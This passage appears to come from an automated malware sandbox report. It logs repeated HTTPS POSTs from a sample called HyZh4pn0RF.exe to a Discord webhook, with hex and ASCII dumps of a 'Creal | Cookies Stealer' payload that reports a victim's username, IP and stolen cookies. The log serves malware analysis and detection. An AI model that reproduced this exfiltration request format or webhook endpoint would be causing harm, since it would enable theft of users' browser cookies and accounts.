                                                                                                                                                                                                                                                                                                2024-09-27 16:18:57 UTC332OUTPOST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1
                                                                                                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                Content-Length: 647
                                                                                                                                                                                                                                                                                                Host: discord.com
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                2024-09-27 16:18:57 UTC647OUTData Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 43 72 65 61 6c 20 7c 20 43 6f 6f 6b 69 65 73 20 53 74 65 61 6c 65 72 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 3c 3a 61 70 6f 6c 6c 6f 6e 64 65 6c 69 72 6d 69 73 3a 31 30 31 32 33 37 30 31 38 30 38 34 35 38 38 33 34 39 33 3e 3a 20 2a 2a 41 63 63 6f 75 6e 74 73 3a 2a 2a 5c 6e 5c 6e 5c 6e 5c 6e 2a 2a 44 61 74 61 3a 2a 2a 5c 6e 3c 3a 63 6f 6f 6b 69 65 73 5f 74 6c 6d 3a 38 31 36 36 31 39 30 36 33 36 31 38 35 36 38 32 33 34 3e 20 5c 75 32 30 32 32 20 2a 2a 32 2a 2a 20 43 6f 6f 6b 69
                                                                                                                                                                                                                                                                                                Data Ascii: {"content": ":flag_us: - `user | 8.46.123.33 (United States)`", "embeds": [{"title": "Creal | Cookies Stealer", "description": "<:apollondelirmis:1012370180845883493>: **Accounts:**\n\n\n\n**Data:**\n<:cookies_tlm:816619063618568234> \u2022 **2** Cooki
                                                                                                                                                                                                                                                                                                2024-09-27 16:18:57 UTC1343INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                Date: Fri, 27 Sep 2024 16:18:57 GMT
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                Content-Length: 45
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                set-cookie: __dcfduid=329b7f587cec11ef8759067ba21bebfe; Expires=Wed, 26-Sep-2029 16:18:57 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                                                                                                                                                                x-ratelimit-limit: 5
                                                                                                                                                                                                                                                                                                x-ratelimit-remaining: 4
                                                                                                                                                                                                                                                                                                x-ratelimit-reset: 1727453938
                                                                                                                                                                                                                                                                                                x-ratelimit-reset-after: 1
                                                                                                                                                                                                                                                                                                via: 1.1 google
                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=weV7j%2B%2Fcm0bfSD3Kn5sHq07M%2B6lbS%2FhKRcUWz6GP83C28ALA2TC5IRp1Lnk%2FvXKu7XEUfSZdbjm%2F9wbpO9eAUdfRwHnrRcLpwbE2MFiD9lvZPxM5vDfOXpI8UQi%2B"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                                                                                                                                                                                                Set-Cookie: __sdcfduid=329b7f587cec11ef8759067ba21bebfed62991a5c924e1de9d3ff54e7f992b67e3ad9dec8eea5d81c7fdcb92c1cf2105; Expires=Wed, 26-Sep-2029 16:18:57 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                Set-Cookie: __cfruid=8e1ec1b277cf704c68f172d827a97e5d2a5c3a4f-1727453937; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                2024-09-27 16:18:57 UTC211INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 48 58 31 4c 66 67 6d 61 6c 66 68 37 6e 6a 6d 6e 47 42 66 39 68 4e 79 31 4e 63 38 65 34 33 4e 50 4d 78 78 47 32 55 59 66 36 64 63 2d 31 37 32 37 34 35 33 39 33 37 35 31 34 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 39 63 64 30 30 35 30 39 38 62 30 66 37 66 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: Set-Cookie: _cfuvid=HX1Lfgmalfh7njmnGBf9hNy1Nc8e43NPMxxG2UYf6dc-1727453937514-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8c9cd005098b0f7f-EWR
                                                                                                                                                                                                                                                                                                2024-09-27 16:18:57 UTC45INData Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                                                                                                                                                                                                                                                                                Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                23192.168.2.849735162.159.136.2324434040C:\Users\user\Desktop\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-09-27 16:18:58 UTC332OUTPOST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1
                                                                                                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                Content-Length: 647
                                                                                                                                                                                                                                                                                                Host: discord.com
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                2024-09-27 16:18:58 UTC647OUTData Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 43 72 65 61 6c 20 7c 20 43 6f 6f 6b 69 65 73 20 53 74 65 61 6c 65 72 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 3c 3a 61 70 6f 6c 6c 6f 6e 64 65 6c 69 72 6d 69 73 3a 31 30 31 32 33 37 30 31 38 30 38 34 35 38 38 33 34 39 33 3e 3a 20 2a 2a 41 63 63 6f 75 6e 74 73 3a 2a 2a 5c 6e 5c 6e 5c 6e 5c 6e 2a 2a 44 61 74 61 3a 2a 2a 5c 6e 3c 3a 63 6f 6f 6b 69 65 73 5f 74 6c 6d 3a 38 31 36 36 31 39 30 36 33 36 31 38 35 36 38 32 33 34 3e 20 5c 75 32 30 32 32 20 2a 2a 32 2a 2a 20 43 6f 6f 6b 69
                                                                                                                                                                                                                                                                                                Data Ascii: {"content": ":flag_us: - `user | 8.46.123.33 (United States)`", "embeds": [{"title": "Creal | Cookies Stealer", "description": "<:apollondelirmis:1012370180845883493>: **Accounts:**\n\n\n\n**Data:**\n<:cookies_tlm:816619063618568234> \u2022 **2** Cooki
                                                                                                                                                                                                                                                                                                2024-09-27 16:18:58 UTC1335INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                Date: Fri, 27 Sep 2024 16:18:58 GMT
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                Content-Length: 45
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                set-cookie: __dcfduid=330b72687cec11ef9d31a6b2eb948c40; Expires=Wed, 26-Sep-2029 16:18:58 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                                                                                                                                                                x-ratelimit-limit: 5
                                                                                                                                                                                                                                                                                                x-ratelimit-remaining: 4
                                                                                                                                                                                                                                                                                                x-ratelimit-reset: 1727453939
                                                                                                                                                                                                                                                                                                x-ratelimit-reset-after: 1
                                                                                                                                                                                                                                                                                                via: 1.1 google
                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aqWDRFTvp7syoDR0H0EdkpPkq3D6OAiDbXYchTpVg1lH%2FyKK23Jg8JVi4zzOfjiOU2VkxUu%2FiviTs%2BWpF77UbgrKT78LhNpFboinuacLDIMb7OSPGJ8LlTrFbJmH"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                                                                                                                                                                                                Set-Cookie: __sdcfduid=330b72687cec11ef9d31a6b2eb948c403f464fd8fe449b60da10b36b6a4d7712c0782e29ea00433a3fce18170ff87869; Expires=Wed, 26-Sep-2029 16:18:58 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                Set-Cookie: __cfruid=91e624c7b228afc6fcf83acd401688349adc8fc6-1727453938; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                2024-09-27 16:18:58 UTC211INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 36 34 79 46 53 62 67 63 51 59 6b 31 61 4a 69 49 50 66 43 34 4b 47 61 31 4a 38 78 44 58 4f 72 65 69 33 5f 47 54 63 5a 5a 77 55 73 2d 31 37 32 37 34 35 33 39 33 38 32 36 30 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 39 63 64 30 30 39 36 38 62 65 38 63 63 38 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: Set-Cookie: _cfuvid=64yFSbgcQYk1aJiIPfC4KGa1J8xDXOrei3_GTcZZwUs-1727453938260-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8c9cd00968be8cc8-EWR
                                                                                                                                                                                                                                                                                                2024-09-27 16:18:58 UTC45INData Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                                                                                                                                                                                                                                                                                Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                24192.168.2.849736162.159.136.2324434040C:\Users\user\Desktop\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-09-27 16:18:58 UTC332OUTPOST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1
                                                                                                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                Content-Length: 647
                                                                                                                                                                                                                                                                                                Host: discord.com
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                2024-09-27 16:18:58 UTC647OUTData Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 43 72 65 61 6c 20 7c 20 43 6f 6f 6b 69 65 73 20 53 74 65 61 6c 65 72 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 3c 3a 61 70 6f 6c 6c 6f 6e 64 65 6c 69 72 6d 69 73 3a 31 30 31 32 33 37 30 31 38 30 38 34 35 38 38 33 34 39 33 3e 3a 20 2a 2a 41 63 63 6f 75 6e 74 73 3a 2a 2a 5c 6e 5c 6e 5c 6e 5c 6e 2a 2a 44 61 74 61 3a 2a 2a 5c 6e 3c 3a 63 6f 6f 6b 69 65 73 5f 74 6c 6d 3a 38 31 36 36 31 39 30 36 33 36 31 38 35 36 38 32 33 34 3e 20 5c 75 32 30 32 32 20 2a 2a 32 2a 2a 20 43 6f 6f 6b 69
                                                                                                                                                                                                                                                                                                Data Ascii: {"content": ":flag_us: - `user | 8.46.123.33 (United States)`", "embeds": [{"title": "Creal | Cookies Stealer", "description": "<:apollondelirmis:1012370180845883493>: **Accounts:**\n\n\n\n**Data:**\n<:cookies_tlm:816619063618568234> \u2022 **2** Cooki
                                                                                                                                                                                                                                                                                                2024-09-27 16:18:58 UTC1341INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                Date: Fri, 27 Sep 2024 16:18:58 GMT
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                Content-Length: 45
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                set-cookie: __dcfduid=3373e0aa7cec11efb69c0e478e5d82a7; Expires=Wed, 26-Sep-2029 16:18:58 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                                                                                                                                                                x-ratelimit-limit: 5
                                                                                                                                                                                                                                                                                                x-ratelimit-remaining: 4
                                                                                                                                                                                                                                                                                                x-ratelimit-reset: 1727453940
                                                                                                                                                                                                                                                                                                x-ratelimit-reset-after: 1
                                                                                                                                                                                                                                                                                                via: 1.1 google
                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=E6JgMhDovB4s%2Fqu%2BJZullT8n%2BwHKbJcn3kZhxpXnvc3fa1TJ9y%2FeZ4cxlc1s8jSaPbpV0qIbnFfs1G8nI%2B9tbaWi%2B8NdUhlK05jQUIogMItQdqxJgplU3GKx1Lzj"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                                                                                                                                                                                                Set-Cookie: __sdcfduid=3373e0aa7cec11efb69c0e478e5d82a7b55a41caa7f284bfb007246733a54c791206f9615674ad856e7525e21bb19b34; Expires=Wed, 26-Sep-2029 16:18:58 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                Set-Cookie: __cfruid=91e624c7b228afc6fcf83acd401688349adc8fc6-1727453938; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                2024-09-27 16:18:58 UTC211INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 38 2e 6c 72 67 74 30 41 51 2e 44 5a 2e 2e 66 71 79 53 44 50 78 6e 36 39 45 51 53 67 4b 43 63 31 47 4a 37 68 36 50 34 42 71 63 6f 2d 31 37 32 37 34 35 33 39 33 38 39 32 36 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 39 63 64 30 30 64 65 39 34 61 37 63 36 61 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: Set-Cookie: _cfuvid=8.lrgt0AQ.DZ..fqySDPxn69EQSgKCc1GJ7h6P4Bqco-1727453938926-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8c9cd00de94a7c6a-EWR
                                                                                                                                                                                                                                                                                                2024-09-27 16:18:58 UTC45INData Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                                                                                                                                                                                                                                                                                Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                25192.168.2.849737162.159.136.2324434040C:\Users\user\Desktop\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-09-27 16:18:59 UTC332OUTPOST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1
                                                                                                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                Content-Length: 647
                                                                                                                                                                                                                                                                                                Host: discord.com
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                2024-09-27 16:18:59 UTC647OUTData Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 43 72 65 61 6c 20 7c 20 43 6f 6f 6b 69 65 73 20 53 74 65 61 6c 65 72 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 3c 3a 61 70 6f 6c 6c 6f 6e 64 65 6c 69 72 6d 69 73 3a 31 30 31 32 33 37 30 31 38 30 38 34 35 38 38 33 34 39 33 3e 3a 20 2a 2a 41 63 63 6f 75 6e 74 73 3a 2a 2a 5c 6e 5c 6e 5c 6e 5c 6e 2a 2a 44 61 74 61 3a 2a 2a 5c 6e 3c 3a 63 6f 6f 6b 69 65 73 5f 74 6c 6d 3a 38 31 36 36 31 39 30 36 33 36 31 38 35 36 38 32 33 34 3e 20 5c 75 32 30 32 32 20 2a 2a 32 2a 2a 20 43 6f 6f 6b 69
                                                                                                                                                                                                                                                                                                Data Ascii: {"content": ":flag_us: - `user | 8.46.123.33 (United States)`", "embeds": [{"title": "Creal | Cookies Stealer", "description": "<:apollondelirmis:1012370180845883493>: **Accounts:**\n\n\n\n**Data:**\n<:cookies_tlm:816619063618568234> \u2022 **2** Cooki
                                                                                                                                                                                                                                                                                                2024-09-27 16:18:59 UTC1333INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                Date: Fri, 27 Sep 2024 16:18:59 GMT
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                Content-Length: 45
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                set-cookie: __dcfduid=33dc716a7cec11ef890f96ff52647fd0; Expires=Wed, 26-Sep-2029 16:18:59 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                                                                                                                                                                x-ratelimit-limit: 5
                                                                                                                                                                                                                                                                                                x-ratelimit-remaining: 4
                                                                                                                                                                                                                                                                                                x-ratelimit-reset: 1727453940
                                                                                                                                                                                                                                                                                                x-ratelimit-reset-after: 1
                                                                                                                                                                                                                                                                                                via: 1.1 google
                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JPeZZdHiAL4LQe81%2B6lNMjplFr7IRKU57LCtkAiCXxOEsMSGoJckKZmAGjtXlSF8nSWG9pmlT7tGv9VcVg3S7e4fO%2B1K04nLUgleimJPiEv8DYqH4XYMgJZXN9SP"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                                                                                                                                                                                                Set-Cookie: __sdcfduid=33dc716a7cec11ef890f96ff52647fd0765c1bad81131c38e995494547fec0b7c3e82588608aa36ea38fba7f4e69523c; Expires=Wed, 26-Sep-2029 16:18:59 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                Set-Cookie: __cfruid=5021d9c541e5ec266375367b8a579b9688877fb3-1727453939; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                2024-09-27 16:18:59 UTC211INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 6d 65 34 77 58 56 54 54 4c 34 49 75 56 6e 56 51 57 55 37 7a 48 68 76 4d 69 47 46 6c 62 72 79 52 48 62 32 78 76 77 55 7a 4a 72 6f 2d 31 37 32 37 34 35 33 39 33 39 36 31 31 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 39 63 64 30 31 32 31 65 62 39 30 66 37 30 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: Set-Cookie: _cfuvid=me4wXVTTL4IuVnVQWU7zHhvMiGFlbryRHb2xvwUzJro-1727453939611-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8c9cd0121eb90f70-EWR
                                                                                                                                                                                                                                                                                                2024-09-27 16:18:59 UTC45INData Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                                                                                                                                                                                                                                                                                Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                26192.168.2.849738162.159.136.2324434040C:\Users\user\Desktop\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:00 UTC332OUTPOST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1
                                                                                                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                Content-Length: 647
                                                                                                                                                                                                                                                                                                Host: discord.com
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:00 UTC647OUTData Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 43 72 65 61 6c 20 7c 20 43 6f 6f 6b 69 65 73 20 53 74 65 61 6c 65 72 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 3c 3a 61 70 6f 6c 6c 6f 6e 64 65 6c 69 72 6d 69 73 3a 31 30 31 32 33 37 30 31 38 30 38 34 35 38 38 33 34 39 33 3e 3a 20 2a 2a 41 63 63 6f 75 6e 74 73 3a 2a 2a 5c 6e 5c 6e 5c 6e 5c 6e 2a 2a 44 61 74 61 3a 2a 2a 5c 6e 3c 3a 63 6f 6f 6b 69 65 73 5f 74 6c 6d 3a 38 31 36 36 31 39 30 36 33 36 31 38 35 36 38 32 33 34 3e 20 5c 75 32 30 32 32 20 2a 2a 32 2a 2a 20 43 6f 6f 6b 69
                                                                                                                                                                                                                                                                                                Data Ascii: {"content": ":flag_us: - `user | 8.46.123.33 (United States)`", "embeds": [{"title": "Creal | Cookies Stealer", "description": "<:apollondelirmis:1012370180845883493>: **Accounts:**\n\n\n\n**Data:**\n<:cookies_tlm:816619063618568234> \u2022 **2** Cooki
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:00 UTC1329INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                Date: Fri, 27 Sep 2024 16:19:00 GMT
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                Content-Length: 45
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                set-cookie: __dcfduid=34574a527cec11efa2060e62cbdde762; Expires=Wed, 26-Sep-2029 16:19:00 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                                                                                                                                                                x-ratelimit-limit: 5
